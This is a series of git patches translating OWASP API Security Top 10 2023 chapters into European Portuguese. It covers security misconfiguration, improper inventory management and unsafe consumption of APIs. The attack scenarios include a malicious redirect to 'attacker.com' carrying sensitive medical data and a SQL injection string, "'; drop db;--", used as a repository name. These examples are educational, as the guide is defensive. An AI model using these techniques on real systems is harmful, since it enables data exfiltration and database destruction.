@@ -51,53 +51,58 @@ servidor controlado remotamente pelo atacante. ### Cenário #2 -A social network website offers a "Direct Message" feature that allows users to -keep private conversations. To retrieve new messages for a specific -conversation, the website issues the following API request (user interaction is -not required): +Um site de rede social oferece uma funcionalidade de "Mensagem Direta" que +permite aos utilizadores manter conversas privadas. Para recuperar novas +mensagens de uma conversa específica, o site emite o seguinte pedido de API (a +interação do utilizador não é necessária): ``` GET /dm/user_updates.json?conversation_id=1234567&cursor=GRlFp7LCUAAAA ``` -Because the API response does not include the `Cache-Control` HTTP response -header, private conversations end-up cached by the web browser, allowing -malicious actors to retrieve them from the browser cache files in the -filesystem. - -## How To Prevent - -The API life cycle should include: - -* A repeatable hardening process leading to fast and easy deployment of a - properly locked down environment -* A task to review and update configurations across the entire API stack. The - review should include: orchestration files, API components, and cloud - services (e.g. S3 bucket permissions) -* An automated process to continuously assess the effectiveness of the - configuration and settings in all environments - -Furthermore: - -* Ensure that all API communications from the client to the API server and any - downstream/upstream components happen over an encrypted communication channel - (TLS), regardless of whether it is an internal or public-facing API. -* Be specific about which HTTP verbs each API can be accessed by: all other - HTTP verbs should be disabled (e.g. HEAD). 
-* APIs expecting to be accessed from browser-based clients (e.g., WebApp - front-end) should, at least: - * implement a proper Cross-Origin Resource Sharing (CORS) policy - * include applicable Security Headers -* Restrict incoming content types/data formats to those that meet the business/ - functional requirements. -* Ensure all servers in the HTTP server chain (e.g. load balancers, reverse - and forward proxies, and back-end servers) process incoming requests in a - uniform manner to avoid desync issues. -* Where applicable, define and enforce all API response payload schemas, - including error responses, to prevent exception traces and other valuable - information from being sent back to attackers. - -## References +Como a resposta da API não inclui o cabeçalho de resposta HTTP `Cache-Control`, +as conversas privadas acabam por ser armazenadas em cache pelo navegador, +permitindo que agentes mal-intencionados as recuperem dos ficheiros de cache do +navegador no sistema de ficheiros. + +## Como Prevenir + +O ciclo de vida da API deve incluir: + +* Um processo de proteção reprodutível que possa ser implantado de forma fácil + e rápida com vista a um ambiente de execução devidamente protegido. +* Um processo de revisão e atualização de todas as camadas da API. A revisão + deve incluir: ficheiros de orquestração, componentes da API e serviços na + nuvem (e.g., permissões dos _buckets_ S3). +* Um processo automatizado para verificar de forma continua as configurações e + definições em todos os ambientes (produção, _staging_, testes, + desenvolvimento). + +E ainda: + +* Assegure que todas as comunicações de API, do cliente para o servidor de API e + qualquer componente _downstream_/_upstream_, ocorram através de um canal de + comunicação encriptado (TLS), independentemente de se tratar de uma API + interna ou pública. +* Seja específico sobre quais verbos HTTP cada API pode utilizar: todos os + outros verbos HTTP devem ser desativados (por exemplo, HEAD). 
+* As APIs que esperam ser acedidas a partir de clientes baseados em navegador + (por exemplo, aplicação web _front-end_) devem, pelo menos: + * implementar uma política adequada de Partilha de Recursos entre Origens + (CORS). + * incluir os Cabeçalhos de Segurança aplicáveis. +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +* Restrinja os tipos de conteúdo/formatos de dados recebidos àqueles que cumprem + os requisitos funcionais/de negócio. +* Assegure que todos os servidores na cadeia de servidores HTTP (por exemplo, + balanceadores de carga, proxies reversos e diretos, e servidores de + _back-end_) processem os pedidos de entrada de forma uniforme para evitar + problemas de dessincronização. +* Quando aplicável, defina e faça cumprir todos os esquemas de dados de resposta + da API, incluindo respostas de erro, para evitar que informações de exceções e + outras informações valiosas sejam enviadas para os atacantes. + +## Referências ### OWASP @@ -107,7 +112,7 @@ Furthermore: * [Testing for Error Handling - Web Security Testing Guide][3] * [Testing for Cross Site Request Forgery - Web Security Testing Guide][4] -### External +### Externas * [CWE-2: Environmental Security Flaws][5] * [CWE-16: Configuration][6] From 5081633c8f8095b12660d2c17671b994fc931eaf Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 31 Oct 2024 13:38:28 +0000 Subject: [PATCH 48/64] Update 0xa8-security-misconfiguration.md --- editions/2023/pt-pt/0xa8-security-misconfiguration.md | 1 - 1 file changed, 1 deletion(-) diff --git a/editions/2023/pt-pt/0xa8-security-misconfiguration.md b/editions/2023/pt-pt/0xa8-security-misconfiguration.md index 122220c6f..0ac606783 100644 --- a/editions/2023/pt-pt/0xa8-security-misconfiguration.md +++ b/editions/2023/pt-pt/0xa8-security-misconfiguration.md 
@@ -91,7 +91,6 @@ E ainda: * implementar uma política adequada de Partilha de Recursos entre Origens (CORS). * incluir os Cabeçalhos de Segurança aplicáveis. -aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa * Restrinja os tipos de conteúdo/formatos de dados recebidos àqueles que cumprem os requisitos funcionais/de negócio. * Assegure que todos os servidores na cadeia de servidores HTTP (por exemplo, From 43863d4de30322437e752401c6350caf5c83f294 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 31 Oct 2024 16:49:01 +0000 Subject: [PATCH 49/64] Update 0xa9-improper-inventory-management.md --- .../0xa9-improper-inventory-management.md | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/editions/2023/pt-pt/0xa9-improper-inventory-management.md b/editions/2023/pt-pt/0xa9-improper-inventory-management.md index 64458f478..0365107b1 100644 --- a/editions/2023/pt-pt/0xa9-improper-inventory-management.md +++ b/editions/2023/pt-pt/0xa9-improper-inventory-management.md 
@@ -1,11 +1,11 @@ # API9:2023 Improper Inventory Management -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Average** | Technical **Moderate** : Business Specific | -| Threat agents usually get unauthorized access through old API versions or endpoints left running unpatched and using weaker security requirements. In some cases exploits are available. Alternatively, they may get access to sensitive data through a 3rd party with whom there's no reason to share data with. | Outdated documentation makes it more difficult to find and/or fix vulnerabilities. Lack of assets inventory and retirement strategies leads to running unpatched systems, resulting in leakage of sensitive data. It's common to find unnecessarily exposed API hosts because of modern concepts like microservices, which make applications easy to deploy and independent (e.g. cloud computing, K8S). Simple Google Dorking, DNS enumeration, or using specialized search engines for various types of servers (webcams, routers, servers, etc.) connected to the internet will be enough to discover targets. | Attackers can gain access to sensitive data, or even take over the server. Sometimes different API versions/deployments are connected to the same database with real data. Threat agents may exploit deprecated endpoints available in old API versions to get access to administrative functions or exploit known vulnerabilities. | +| Específico da API : Abuso **Fácil** | Prevalência **Predominante** : Deteção **Moderado** | Técnico **Moderado** : Específico Negócio | +| Os agentes ameaça geralmente obtêm acesso não autorizado através de versões antigas de APIs ou _endpoints_ que permanecem em execução sem atualizações e que utilizam requisitos de segurança mais fracos. Em alguns casos, os _exploits_ estão disponíveis online. 
Alternativamente, podem obter acesso a dados sensíveis através de um terceiro com quem não há razão para compartilhar dados. | Documentação desatualizada torna mais difícil encontrar e/ou corrigir vulnerabilidades. A falta de inventário de recursos e estratégias de desativação leva à execução de sistemas sem atualizações, resultando em vazamentos de dados sensíveis. É comum encontrar hosts de API desnecessariamente expostos devido a conceitos modernos como microserviços, que tornam as aplicações fáceis de implantar e independentes (por exemplo, computação em nuvem, K8S). Um simples Google Dorking, enumeração de DNS ou o uso de motores de busca especializados para vários tipos de servidores (webcams, routers, servidores, etc.) conectados à internet será suficiente para descobrir alvos. | Os atacantes podem obter acesso a dados sensíveis ou até mesmo tomar o controlo do servidor. Às vezes, diferentes versões/implementações da API estão conectadas à mesma base de dados com dados reais. Agentes ameaça podem explorar _endpoints_ obsoletos disponíveis em versões antigas da API para obter acesso a funções administrativas ou explorar vulnerabilidades conhecidas. | -## Is the API Vulnerable? +## A API é vulnerável? The sprawled and connected nature of APIs and modern applications brings new challenges. It is important for organizations not only to have a good @@ -40,9 +40,9 @@ An API has a "data flow blindspot" if: * There is not deep visibility of which type of sensitive data is shared -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 A social network implemented a rate-limiting mechanism that blocks attackers from using brute force to guess reset password tokens. This mechanism wasn't 
@@ -53,7 +53,7 @@ API, including the reset password mechanism, but the rate-limiting mechanism was not in place. The researcher was able to reset the password of any user by using simple brute force to guess the 6 digit token. -### Scenario #2 +### Cenário #2 A social network allows developers of independent apps to integrate with it. As part of this process a consent is requested from the end user, so the social @@ -68,7 +68,7 @@ A consulting firm builds a malicious app and manages to get the consent of to the private information of 50,000,000 users. Later, the consulting firm sells the information for malicious purposes. -## How To Prevent +## Como Prevenir * Inventory all API hosts and document important aspects of each one of them, focusing on the API environment (e.g. production, staging, test, @@ -96,9 +96,9 @@ sells the information for malicious purposes. quickly and force all clients to move to the latest version. -## References +## Referências -### External +### Externas * [CWE-1059: Incomplete Documentation][1] From e3a986fa67b3b185c39fe0e1bade9224be83e116 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 31 Oct 2024 19:45:17 +0000 Subject: [PATCH 50/64] Update 0xa9-improper-inventory-management.md --- .../0xa9-improper-inventory-management.md | 145 ++++++++++-------- 1 file changed, 77 insertions(+), 68 deletions(-) diff --git a/editions/2023/pt-pt/0xa9-improper-inventory-management.md b/editions/2023/pt-pt/0xa9-improper-inventory-management.md index 0365107b1..6a6c1ca12 100644 --- a/editions/2023/pt-pt/0xa9-improper-inventory-management.md +++ b/editions/2023/pt-pt/0xa9-improper-inventory-management.md 
@@ -7,94 +7,103 @@ ## A API é vulnerável? -The sprawled and connected nature of APIs and modern applications brings new -challenges. It is important for organizations not only to have a good -understanding and visibility of their own APIs and API endpoints, but also how -the APIs are storing or sharing data with external third parties. +A natureza dispersa e conectada das APIs e das aplicações modernas traz novos +desafios. É importante que as organizações não só tenham uma boa compreensão e +visibilidade das suas próprias APIs e _endpoints_, mas também de como as APIs +estão a armazenar ou a partilhar dados com terceiros. -Running multiple versions of an API requires additional management resources -from the API provider and expands the attack surface. +Executar múltiplas versões de uma API requer recursos de gestão adicionais do +fornecedor da API e expande a superfície de ataque. -An API has a "documentation blindspot" if: +Uma API tem um "ponto cego de documentação" se: -* The purpose of an API host is unclear, and there are no explicit answers to - the following questions - * Which environment is the API running in (e.g. production, staging, test, - development)? - * Who should have network access to the API (e.g. public, internal, partners)? - * Which API version is running? -* There is no documentation or the existing documentation is not updated. -* There is no retirement plan for each API version. -* The host's inventory is missing or outdated. +* O propósito de um _host_ da API é pouco claro e não há respostas explícitas + para as seguintes perguntas: + * Em que ambiente está a API a ser executada (por exemplo, produção, + _staging_, teste, desenvolvimento)? + * Quem deve ter acesso à rede da API (por exemplo, público, interno, + parceiros)? + * Qual versão da API está em execução? +* Não existe documentação ou a documentação existente não está atualizada. +* Não existe um plano de desativação para cada versão da API. 
+* O inventário do _host_ está em falta ou desatualizado. -The visibility and inventory of sensitive data flows play an important role as -part of an incident response plan, in case a breach happens on the third party -side. +A visibilidade e o inventário dos fluxos de dados sensíveis desempenham um papel +importante como parte de um plano de resposta a incidentes, caso ocorra uma +violação do lado de terceiros. -An API has a "data flow blindspot" if: +Uma API tem um "ponto cego de fluxo de dados" se: -* There is a "sensitive data flow" where the API shares sensitive data with a - third party and - * There is not a business justification or approval of the flow - * There is no inventory or visibility of the flow - * There is not deep visibility of which type of sensitive data is shared +* Existe um "fluxo de dados sensíveis" onde a API compartilha dados sensíveis + com um terceiro e + * Não existe uma justificação de negócio ou aprovação do fluxo + * Não existe inventário ou visibilidade do fluxo + * Não há visibilidade detalhada sobre o tipo de dados sensíveis partilhados ## Exemplos de Cenários de Ataque ### Cenário #1 -A social network implemented a rate-limiting mechanism that blocks attackers -from using brute force to guess reset password tokens. This mechanism wasn't -implemented as part of the API code itself but in a separate component between -the client and the official API (`api.socialnetwork.owasp.org`). A researcher -found a beta API host (`beta.api.socialnetwork.owasp.org`) that runs the same -API, including the reset password mechanism, but the rate-limiting mechanism was -not in place. The researcher was able to reset the password of any user by using -simple brute force to guess the 6 digit token. +Uma rede social implementou um mecanismo de limitação de frequência de pedidos +que previne que atacantes possam usar força bruta para adivinhar _tokens_ de +redefinição de _password_. 
Este mecanismo não foi implementado como parte do +código da própria API, mas num componente separado entre o cliente e a API +oficial (`api.socialnetwork.owasp.org`). Um investigador encontrou um _host_ da +API beta (`beta.api.socialnetwork.owasp.org`) que executa a mesma API, incluindo +o mecanismo de redefinição de _password_, mas sem o mecanismo de limitação de +frequência de pedidos. O investigador conseguiu redefinir a _password_ de +qualquer utilizador usando força bruta simples para adivinhar o _token_ de 6 +dígitos. ### Cenário #2 -A social network allows developers of independent apps to integrate with it. As -part of this process a consent is requested from the end user, so the social -network can share the user's personal information with the independent app. +Uma rede social permite que desenvolvedores de aplicações independentes se +integrem com ela. Como parte desse processo, é solicitado o consentimento do +utilizador final para que a rede social possa partilhar as informações pessoais +do utilizador com a aplicação independente. -The data flow between the social network and the independent apps is not -restrictive or monitored enough, allowing independent apps to access not only -the user information but also the private information of all of their friends. +O fluxo de dados entre a rede social e as aplicações independentes não é +suficientemente restritivo ou monitorizado, permitindo que as aplicações acedam +não apenas às informações do utilizador, mas também às informações privadas de +todos os seus amigos. -A consulting firm builds a malicious app and manages to get the consent of -270,000 users. Because of the flaw, the consulting firm manages to get access -to the private information of 50,000,000 users. Later, the consulting firm -sells the information for malicious purposes. +Uma empresa de consultoria cria uma aplicação maliciosa e consegue obter o +consentimento de 270 mil utilizadores. 
Devido a essa falha, a empresa de +consultoria consegue aceder às informações privadas de 50 milhões de +utilizadores. Mais tarde, a empresa de consultoria vende as informações para +fins maliciosos. ## Como Prevenir -* Inventory all API hosts and document important aspects of each one - of them, focusing on the API environment (e.g. production, staging, test, - development), who should have network access to the host (e.g. public, - internal, partners) and the API version. -* Inventory integrated services and document important aspects such - as their role in the system, what data is exchanged (data flow), and their - sensitivity. -* Document all aspects of your API such as authentication, errors, redirects, - rate limiting, cross-origin resource sharing (CORS) policy, and endpoints, - including their parameters, requests, and responses. -* Generate documentation automatically by adopting open standards. Include the - documentation build in your CI/CD pipeline. -* Make API documentation available only to those authorized to use the API. -* Use external protection measures such as API security specific solutions for - all exposed versions of your APIs, not just for the current production - version. -* Avoid using production data with non-production API deployments. If this is - unavoidable, these endpoints should get the same security treatment as the - production ones. -* When newer versions of APIs include security improvements, perform a risk - analysis to inform the mitigation actions required for the older versions. - For example, whether it is possible to backport the improvements without - breaking API compatibility or if you need to take the older version out - quickly and force all clients to move to the latest version. 
- +* Inventarie todos os _hosts_ da API e documentar os aspectos + importantes de cada um deles, focando no ambiente da API (por exemplo, + produção, _staging_, teste, desenvolvimento), quem deve ter acesso à rede do + _host_ (por exemplo, público, interno, parceiros) e a versão da API. +* Inventarie os serviços integrados e documentar aspectos + importantes, como o seu papel no sistema, quais dados são trocados (fluxo de + dados) e a sua sensibilidade. +* Documente todos os aspectos da sua API, como autenticação, erros, + redirecionamentos, limitação de frequência de pedidos, política de partilha de + recursos entre origens (CORS) e _endpoints_, incluindo os seus parâmetros, + pedidos e respostas. +* Crie documentação automaticamente adotando padrões abertos. Inclua a + construção da documentação no seu _pipeline_ de CI/CD. +* Disponibilize a documentação da API apenas para aqueles autorizados a utilizar + a API. +* Utilize medidas de proteção externas, como soluções específicas de segurança + de API, para todas as versões expostas das suas APIs, não apenas para a versão + de produção atual. +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +* Evite utilizar dados de produção em implementações de API que não são + produção. Se isso for inevitável, esses _endpoints_ devem receber o mesmo + tratamento de segurança que os de produção. +* Quando versões mais recentes das APIs incluem melhorias de segurança, realize + uma análise de risco para informar as ações de mitigação necessárias para as + versões mais antigas. Por exemplo, se é possível aplicar as melhorias nessas + versões mais antigas sem quebrar a compatibilidade da API ou se é necessário + remover rapidamente a versão mais antiga e forçar todos os clientes a migrar + para a versão mais recente. ## Referências From 0bf8741ef462e8067bf51d47a04f1b365926fabf Mon Sep 17 00:00:00 2001 
From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com>
Date: Thu, 31 Oct 2024 19:48:18 +0000
Subject: [PATCH 51/64] Update 0xaa-unsafe-consumption-of-apis.md
---
editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md
index 016b1ddba..f9bd78eff 100644
--- a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md
+++ b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md
@@ -1,11 +1,11 @@ # API10:2023 Unsafe Consumption of APIs -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Average** | Technical **Severe** : Business Specific | +| Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Moderado** | Técnico **Severo** : Específico Negócio | | Exploiting this issue requires attackers to identify and potentially compromise other APIs/services the target API integrated with. Usually, this information is not publicly available or the integrated API/service is not easily exploitable. | Developers tend to trust and not verify the endpoints that interact with external or third-party APIs, relying on weaker security requirements such as those regarding transport security, authentication/authorization, and input validation and sanitization. Attackers need to identify services the target API integrates with (data sources) and, eventually, compromise them. | The impact varies according to what the target API does with pulled data. Successful exploitation may lead to sensitive information exposure to unauthorized actors, many kinds of injections, or denial of service. | -## Is the API Vulnerable? +## A API é vulnerável? Developers tend to trust data received from third-party APIs more than user input. This is especially true for APIs offered by well-known companies. From 7c80945cc91e45e59a3df53e6814d4a4adaaf2c4 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 31 Oct 2024 22:48:25 +0000 Subject: [PATCH 52/64] Update 0xaa-unsafe-consumption-of-apis.md --- .../pt-pt/0xaa-unsafe-consumption-of-apis.md | 43 ++++++++++--------- 1 file changed, 22 insertions(+), 21 deletions(-) 
diff --git a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md
index f9bd78eff..a5985fa2b 100644
--- a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md
+++ b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md
@@ -3,29 +3,30 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Moderado** | Técnico **Severo** : Específico Negócio | -| Exploiting this issue requires attackers to identify and potentially compromise other APIs/services the target API integrated with. Usually, this information is not publicly available or the integrated API/service is not easily exploitable. | Developers tend to trust and not verify the endpoints that interact with external or third-party APIs, relying on weaker security requirements such as those regarding transport security, authentication/authorization, and input validation and sanitization. Attackers need to identify services the target API integrates with (data sources) and, eventually, compromise them. | The impact varies according to what the target API does with pulled data. Successful exploitation may lead to sensitive information exposure to unauthorized actors, many kinds of injections, or denial of service. | +| Explorar este problema requer que os atacantes identifiquem e potencialmente comprometam outras APIs/serviços com os quais a API alvo está integrada. Normalmente, esta informação não está disponível publicamente ou a API/serviço integrado não é facilmente explorável. | Os desenvolvedores tendem a confiar e não a verificar os _endpoints_ que interagem com APIs externas ou de terceiros, dependendo de requisitos de segurança mais fracos, como aqueles relacionados à segurança do transporte, autenticação/autorização e validação e sanitização de dados. Os atacantes precisam identificar os serviços com os quais a API alvo se integra (fontes de dados) e, eventualmente, comprometer esses serviços. | O impacto varia de acordo com o que a API alvo faz com os dados extraídos. A exploração bem sucedida pode levar à exposição de informações sensíveis a atores não autorizados, a vários tipos de injeções ou à negação de serviço. 
| ## A API é vulnerável? -Developers tend to trust data received from third-party APIs more than user -input. This is especially true for APIs offered by well-known companies. -Because of that, developers tend to adopt weaker security standards, for -instance, in regards to input validation and sanitization. +Os desenvolvedores tendem a confiar mais nos dados recebidos de APIs de +terceiros do que nos dados fornecidos por utilizadores. Isso é especialmente +verdade para APIs oferecidas por empresas bem conhecidas. Por essa razão, os +desenvolvedores tendem a adotar padrões de segurança mais fracos, especialmente +no que diz respeito à validação e sanitização de dados. -The API might be vulnerable if: +A API pode estar vulnerável se: -* Interacts with other APIs over an unencrypted channel; -* Does not properly validate and sanitize data gathered from other APIs prior - to processing it or passing it to downstream components; -* Blindly follows redirections; -* Does not limit the number of resources available to process third-party - services responses; -* Does not implement timeouts for interactions with third-party services; +* Interage com outras APIs através de um canal não encriptado; +* Não valida e sanitiza corretamente os dados recolhidos de outras APIs antes de + os processar ou de os passar para componentes posteriores; +* Segue redirecionamentos cegamente; +* Não limita o número de recursos disponíveis para processar respostas de + serviços de terceiros; +* Não implementa limites de tempo para interações com serviços de terceiros; -## Example Attack Scenarios - -### Scenario #1 +## Exemplos de Cenários de Ataque +### Cenário #1 +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa An API relies on a third-party service to enrich user provided business addresses. When an address is supplied to the API by the end user, it is sent to the third-party service and the returned data is then stored on a local 
@@ -37,7 +38,7 @@ specific input that makes it pull their "malicious business" from the third-party service. The SQLi payload ends up being executed by the database, exfiltrating data to an attacker's controlled server. -### Scenario #2 +### Cenário #2 An API integrates with a third-party service provider to safely store sensitive user medical information. Data is sent over a secure connection using an HTTP @@ -62,7 +63,7 @@ Since the API blindly follows the third-party redirects, it will repeat the exact same request including the user's sensitive data, but this time to the attacker's server. -### Scenario #3 +### Cenário #3 An attacker can prepare a git repository named `'; drop db;--`. @@ -70,7 +71,7 @@ Now, when an integration from an attacked application is done with the malicious repository, SQL injection payload is used on an application that builds an SQL query believing the repository's name is safe input. -## How To Prevent +## Como Prevenir * When evaluating service providers, assess their API security posture. * Ensure all API interactions happen over a secure communication channel (TLS). @@ -80,7 +81,7 @@ builds an SQL query believing the repository's name is safe input. yours to: do not blindly follow redirects. -## References +## Referências ### OWASP @@ -91,7 +92,7 @@ builds an SQL query believing the repository's name is safe input. * [Transport Layer Protection Cheat Sheet][5] * [Unvalidated Redirects and Forwards Cheat Sheet][6] -### External +### Externas * [CWE-20: Improper Input Validation][7] * [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor][8] From 1e2674b1a7a4712438016e1480b4b3f5d766a386 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 31 Oct 2024 23:13:38 +0000 Subject: [PATCH 53/64] Update 0xaa-unsafe-consumption-of-apis.md --- .../pt-pt/0xaa-unsafe-consumption-of-apis.md | 47 ++++++++++--------- 1 file changed, 24 insertions(+), 23 deletions(-) 
diff --git a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md
index a5985fa2b..13f8934b5 100644
--- a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md
+++ b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md
@@ -26,23 +26,24 @@ A API pode estar vulnerável se: ## Exemplos de Cenários de Ataque ### Cenário #1 -aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -An API relies on a third-party service to enrich user provided business -addresses. When an address is supplied to the API by the end user, it is sent -to the third-party service and the returned data is then stored on a local -SQL-enabled database. -Bad actors use the third-party service to store an SQLi payload associated with -a business created by them. Then they go after the vulnerable API providing -specific input that makes it pull their "malicious business" from the -third-party service. The SQLi payload ends up being executed by the database, -exfiltrating data to an attacker's controlled server. +Uma API depende de um serviço de terceiros para enriquecer os endereços +comerciais fornecidos pelos utilizadores. Quando um endereço é fornecido pelo +utilizador final à API, ele é enviado para o serviço de terceiros e os dados +retornados são então armazenados numa base de dados local compatível com SQL. + +Atacantes utilizam o serviço de terceiros para armazenar um conteúdo malicioso +de injeção SQL (SQLi) associado a um negócio criado por eles. Em seguida, visam +a API vulnerável fornecendo um conteúdo específico que faz com que esta obtenha +o "negócio malicioso" do serviço de terceiros. O conteúdo de SQLi acaba por ser +executado pela base de dados, exfiltrando dados para um servidor controlado pelo +atacante. ### Cenário #2 -An API integrates with a third-party service provider to safely store sensitive -user medical information. Data is sent over a secure connection using an HTTP -request like the one below: +Uma API integra-se com um fornecedor de serviços de terceiros para armazenar com +segurança informações médicas sensíveis dos utilizadores. Os dados são enviados +através de uma conexão segura usando um pedido HTTP como o abaixo: ``` POST /user/store_phr_record 
@@ -51,28 +52,28 @@ POST /user/store_phr_record } ``` -Bad actors found a way to compromise the third-party API and it starts -responding with a `308 Permanent Redirect` to requests like the previous one. +Atacantes encontraram uma forma de comprometer a API de terceiros, que começa a +responder com um `308 Permanent Redirect` a pedidos como o anterior. ``` HTTP/1.1 308 Permanent Redirect Location: https://attacker.com/ ``` -Since the API blindly follows the third-party redirects, it will repeat the -exact same request including the user's sensitive data, but this time to the -attacker's server. +Como a API segue cegamente os redirecionamentos do terceiro, ela repetirá +exatamente o mesmo pedido, incluindo os dados sensíveis do utilizador, mas desta +vez para o servidor do atacante. ### Cenário #3 -An attacker can prepare a git repository named `'; drop db;--`. +Um atacante pode preparar um repositório git chamado `'; drop db;--`. -Now, when an integration from an attacked application is done with the -malicious repository, SQL injection payload is used on an application that -builds an SQL query believing the repository's name is safe input. +Agora, quando uma integração de uma aplicação atacada é feita com o repositório +malicioso, uma carga de injeção SQL é utilizada numa aplicação que constrói uma +consulta SQL, acreditando que o nome do repositório é um conteúdo seguro. ## Como Prevenir - +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa * When evaluating service providers, assess their API security posture. * Ensure all API interactions happen over a secure communication channel (TLS). * Always validate and properly sanitize data received from integrated APIs From 9cf22f855c2da9dfd33e8ff3c0d6f2554f364fa1 Mon Sep 17 00:00:00 2001 
From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sat, 2 Nov 2024 22:16:03 +0000 Subject: [PATCH 54/64] Update 0xaa-unsafe-consumption-of-apis.md --- .../2023/pt-pt/0xaa-unsafe-consumption-of-apis.md | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md index 13f8934b5..3081d4048 100644 --- a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md +++ b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md @@ -73,14 +73,15 @@ malicioso, uma carga de injeção SQL é utilizada numa aplicação que constró consulta SQL, acreditando que o nome do repositório é um conteúdo seguro. ## Como Prevenir -aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -* When evaluating service providers, assess their API security posture. -* Ensure all API interactions happen over a secure communication channel (TLS). -* Always validate and properly sanitize data received from integrated APIs - before using it. -* Maintain an allowlist of well-known locations integrated APIs may redirect - yours to: do not blindly follow redirects. +* Ao avaliar fornecedores de serviços, analise a postura de segurança das suas + APIs. +* Garanta que todas as interações com APIs ocorram através de um canal de + comunicação seguro (TLS). +* Valide e sanitize sempre os dados recebidos de APIs integradas antes de os + utilizar. +* Mantenha uma lista de permissões de locais conhecidos para os quais as APIs + integradas podem redirecionar a sua: não siga redirecionamentos cegamente. ## Referências From 7915cce8651fd3c377738c84fb64f8a5e1437335 Mon Sep 17 00:00:00 2001 
From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 05:55:08 +0000 Subject: [PATCH 55/64] Update 0xb0-next-devs.md --- editions/2023/pt-pt/0xb0-next-devs.md | 30 +++++++++++++-------------- 1 file changed, 15 insertions(+), 15 deletions(-) diff --git a/editions/2023/pt-pt/0xb0-next-devs.md b/editions/2023/pt-pt/0xb0-next-devs.md index 89139c49f..2de735d76 100644 --- a/editions/2023/pt-pt/0xb0-next-devs.md +++ b/editions/2023/pt-pt/0xb0-next-devs.md 
@@ -1,24 +1,24 @@ -# What's Next For Developers +# O Que Se Segue Para Programadores -The task to create and maintain secure applications, or fixing existing -applications, can be difficult. It is no different for APIs. +A tarefa de criar e manter aplicações seguras, ou corrigir aplicações +existentes, pode ser difícil. Não é diferente para as APIs. -We believe that education and awareness are key factors to writing secure -software. Everything else required to accomplish the goal depends on -**establishing and using repeatable security processes and standard security -controls**. +Acreditamos que educação e consciencialização são fatores chave para o +desenvolvimento de software seguro. Tudo o mais necessário para alcançar este +objetivo depende da **definição e utilização de processos de segurança +reprodutíveis e do uso de controlos de segurança _standard_**. -OWASP provides numerous free and open resources to help you address security. -Please visit the [OWASP Projects page][1] for a comprehensive list of available -projects. +A OWASP disponibiliza uma grande quantidade de recursos gratuitos e abertos para +abordar a segurança. Por favor visite a [página dos projetos OWASP][1] para +consulta da lista dos projetos existentes. | | | |-|-| -| **Education** | The [Application Security Wayfinder][2] should give you a good idea about what projects are available for each stage/phase of the Software Development LifeCycle (SDLC). For hands-on learning/training you can start with [OWASP **crAPI** - **C**ompletely **R**idiculous **API**][3] or [OWASP Juice Shop][4]: both have intentionally vulnerable APIs. The [OWASP Vulnerable Web Applications Directory Project][5] provides a curated list of intentionally vulnerable applications: you'll find there several other vulnerable APIs. You can also attend 